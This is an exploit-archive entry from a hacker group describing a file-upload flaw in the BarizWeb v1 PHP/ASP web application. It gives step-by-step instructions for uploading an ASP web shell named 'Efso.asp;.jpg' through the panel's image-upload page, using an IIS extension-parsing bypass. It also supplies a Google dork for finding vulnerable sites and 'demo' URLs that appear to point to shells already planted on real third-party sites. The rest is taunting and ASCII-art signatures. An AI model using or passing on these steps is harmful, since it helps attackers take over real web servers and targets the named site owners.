BarizWeb v1 - R|File Upload Vulnerability (BP Method)

2011-03-13T00:00:00
ID 1337DAY-ID-15588
Type zdt
Reporter KnocKout
Modified 2011-03-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            -----------------------------------------------------------
                       I MEMBER FROM IN3CT0R TEAM.
                       1337 DAY ..
                       
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[E-Mail] : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Pretorian, DaiMon, BARCOD3
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BarizWeb
|~Price : Free
|~Version : 1
|~Software: http://www.barizweb.com
|~Vulnerability Style : File Upload
Google Dork : "web tasarým: Barizweb.com"
-----------------------------------------------------------
Demos
-----------------------------------------------------------
http://test.barizweb.com/resimler/efso.asp;.jpg?
http://www.2000ambalaj.com.tr/resimler/rosespy8_beta.asp;.jpg
----------------------------------------

Exploitable.. 
Go To..
http://Victim/Path/panel/resim_yukle_dosya_verileri.asp
OKAY... 
Now Microsoft IIS Vulnerable bypass Method use!
Shell name : Efso.asp
Shell name change : Efso.asp;.jpg
OKAY..
Click to Button..
Uploaded Shell.
 Go to Shell Adress
 
 http://Victim/Path/resimler/[Efsoname.asp;.jpg]


-------------------------------------------------------------

FOR EXPLOIT-DB LAMERS =)

............../'' )
...........,/¯../
........../..../
.../´¯/'...'/´¯¯`•¸
./'/.../..../......./¨¯ \
('(...´...´.... ¯~/'...' )
.\.................'..... /
..'\'...\.......... _.•´
....\..............(
.....\........ 

------------------------------------------------

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                    WAS HERE.
                    
                     Tayfa Yatar.



#  0day.today [2018-03-01]  #